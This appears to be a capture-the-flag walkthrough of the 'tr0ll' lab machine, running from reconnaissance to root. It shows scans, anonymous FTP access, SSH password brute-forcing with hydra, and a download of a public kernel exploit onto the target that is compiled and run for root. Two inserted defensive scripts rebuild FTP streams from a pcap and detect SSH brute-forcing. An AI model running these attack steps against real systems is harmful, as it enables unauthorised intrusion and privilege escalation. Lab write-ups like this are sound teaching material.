$sudo netdiscover

IP -> 192.168.1.42

$nmap -sS -sV -A 192.168.1.42 -p-

Ports 21, 22 and 80 are open, and the FTP service allows anonymous login.

troll

$nikto -h 192.168.1.42

/secret directory

troll

No idea about SSH yet, so I look at FTP.

I notice that anonymous login is enabled on FTP and log in.

$ftp 192.168.1.42
Connected to 192.168.1.42.
220 (vsFTPd 3.0.2)
Name (192.168.1.42:d1scharg3d): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -larh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
drwxr-xr-x 2 0 112 4096 Aug 10 2014 ..
drwxr-xr-x 2 0 112 4096 Aug 10 2014 .
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (10.5256 MB/s)

I open the lol.pcap file I found here with Wireshark.

Someone logged into FTP anonymously and downloaded secret_stuff.txt.

Right-click on packet 1 > Follow > TCP Stream

Well, well, well, aren’t you just a clever little devil, you almost found the

sup3rs3cr3tdirlol 😛

Sucks, you were so close gotta TRY HARDER!
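The "Follow TCP Stream" step above can be done without Wireshark. The script below is an added example, not part of the original write-up: it walks a classic pcap file, pulls the TCP payload out of each Ethernet/IPv4/TCP frame, groups packets by connection and concatenates them in capture order, which is exactly how the FTP control session (and the RETR of secret_stuff.txt) becomes readable. The capture it runs on is constructed in code (a made-up anonymous FTP session on 10.0.0.9); it is not the lol.pcap from the machine.

```python
import struct
from collections import defaultdict

ETH_LEN = 14
PCAP_MAGIC = 0xA1B2C3D4  # little-endian magic, microsecond timestamps


def parse_pcap(data: bytes):
    """Yield raw frame bytes from a classic (non-pcapng) pcap file."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:          # same magic read as big-endian
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    offset = 24                         # skip the global header
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, offset)
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def tcp_payload(frame: bytes):
    """Return (src, sport, dst, dport, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < ETH_LEN + 20:
        return None
    ethertype, = struct.unpack_from("!H", frame, 12)
    if ethertype != 0x0800:             # IPv4 only
        return None
    ip = frame[ETH_LEN:]
    ihl = (ip[0] & 0x0F) * 4
    total_len, = struct.unpack_from("!H", ip, 2)
    if ip[9] != 6:                      # TCP only
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    data_off = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, tcp[data_off:]


def follow_streams(data: bytes):
    """Group TCP payloads by connection; both directions share one sorted key."""
    streams = defaultdict(bytearray)
    for frame in parse_pcap(data):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, payload = parsed
        key = tuple(sorted([(src, sport), (dst, dport)]))
        streams[key] += payload
    return {k: bytes(v) for k, v in streams.items()}


def ftp_commands(stream: bytes):
    """Pick the FTP client commands (USER/PASS/RETR) out of a reconstructed stream."""
    return [line for line in stream.decode("latin-1").splitlines()
            if line.split(" ", 1)[0] in ("USER", "PASS", "RETR")]


def _frame(src, sport, dst, dport, payload: bytes) -> bytes:
    """Build a minimal Ethernet/IPv4/TCP frame (no checksums; enough for parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(x) for x in src.split(".")),
                     bytes(int(x) for x in dst.split("."))) + tcp
    return b"\x00" * 12 + struct.pack("!H", 0x0800) + ip


def build_sample_pcap() -> bytes:
    """Constructed sample capture: an anonymous FTP login followed by a RETR."""
    client, server = ("10.0.0.5", 40001), ("10.0.0.9", 21)
    exchange = [
        (server, client, b"220 (vsFTPd 3.0.2)\r\n"),
        (client, server, b"USER anonymous\r\n"),
        (server, client, b"331 Please specify the password.\r\n"),
        (client, server, b"PASS password\r\n"),
        (server, client, b"230 Login successful.\r\n"),
        (client, server, b"RETR secret_stuff.txt\r\n"),
        (server, client, b"150 Opening BINARY mode data connection.\r\n"),
    ]
    records = b""
    for i, ((src, sport), (dst, dport), payload) in enumerate(exchange):
        frame = _frame(src, sport, dst, dport, payload)
        records += struct.pack("<IIII", 1407600000 + i, 0, len(frame), len(frame)) + frame
    header = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    return header + records


if __name__ == "__main__":
    for key, stream in follow_streams(build_sample_pcap()).items():
        print(key)
        print(stream.decode("latin-1"))
        print(ftp_commands(stream))
```

On a real capture, replace build_sample_pcap() with open("lol.pcap", "rb").read(); the reconstructed stream shows why cleartext FTP (and anonymous login in particular) leaks both the credentials and the file names transferred.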

I went straight to http://192.168.1.42/sup3rs3cr3tdirlol/

There is a 32-bit ELF file named roflmao.

$./roflmao
Find address 0x0856BF to proceed

It took me a while to realize that reversing it would get me nowhere.

The address: http://192.168.1.42/0x0856BF/

The good_luck folder contains a few lines; they could be usernames or passwords.

The this_folder_contains_the_password folder contains a file named Pass.txt.

It contains Good_job_:)

Since the words in the good_luck folder look more like usernames, I use them as the user list

and try Good_job_:) as the password.

$medusa -U which_one_lol.txt -p Good_job_:) -h 192.168.189.197 -M ssh

No luck.

The machine is called tr0ll, and if this is a CTF the password wouldn't be that anyway; it was a pointless attempt. The password is probably Pass.txt itself.

$hydra -L which_one_lol.txt -p Pass.txt 192.168.1.42 ssh

The username turned out to be overflow.
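Every guess hydra or medusa makes against sshd leaves a "Failed password" line in the server's auth log, so the defender's counterpart to the step above is to count failures per source address inside a short window and flag bursts, especially a burst followed by an "Accepted password" from the same address. The script below is an added example, not part of the original write-up; the log lines are constructed (the hostname troll and the user overflow come from the write-up, the other usernames, IPs and timestamps are made up).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

# Constructed sample: six failures in three seconds from one address, then a success,
# plus one isolated failure from another address that should not be flagged.
SAMPLE_LOG = """\
Aug 10 12:00:01 troll sshd[1201]: Failed password for invalid user admin from 192.0.2.10 port 51000 ssh2
Aug 10 12:00:01 troll sshd[1203]: Failed password for invalid user guest from 192.0.2.10 port 51001 ssh2
Aug 10 12:00:02 troll sshd[1205]: Failed password for invalid user test from 192.0.2.10 port 51002 ssh2
Aug 10 12:00:02 troll sshd[1207]: Failed password for overflow from 192.0.2.10 port 51003 ssh2
Aug 10 12:00:03 troll sshd[1209]: Failed password for invalid user ftp from 192.0.2.10 port 51004 ssh2
Aug 10 12:00:03 troll sshd[1211]: Failed password for overflow from 192.0.2.10 port 51005 ssh2
Aug 10 12:00:04 troll sshd[1215]: Accepted password for overflow from 192.0.2.10 port 51008 ssh2
Aug 10 12:30:00 troll sshd[1300]: Failed password for overflow from 192.0.2.55 port 40200 ssh2
"""


def parse_line(line: str, year: int = 2014):
    """Return (timestamp, result, user, ip) for an sshd password line, else None.

    Syslog timestamps carry no year, so one is assumed (2014 matches the sample)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60):
    """Flag source IPs with >= threshold failures inside a sliding window.

    Returns {ip: {"failures": n, "users": distinct usernames tried, "success_after": bool}}."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold:
                flagged[ip] = {"failures": len(q), "users": len(users[ip]), "success_after": False}
        elif result == "Accepted" and ip in flagged:
            # A success right after a burst is the signal that matters most: the guess worked.
            flagged[ip]["success_after"] = True
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Run it over /var/log/auth.log (or journalctl -u ssh output) instead of SAMPLE_LOG; the same counting is what fail2ban and similar tools do before blocking the address, and the success_after flag is the case worth an incident ticket rather than just a ban.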

$ssh overflow@192.168.1.42
overflow@192.168.1.42's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
...
...
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
## looking for an exploit matching Linux kernel 3.13
## --> https://www.exploit-db.com/exploits/37292/
$ cd /tmp
$ wget https://www.exploit-db.com/download/37292
...
...
$ls
37292
$ mv 37292 ofs.c
$ gcc ofs.c -o ofs
$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
#ls /root
total 28K
proof.txt
# cat /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc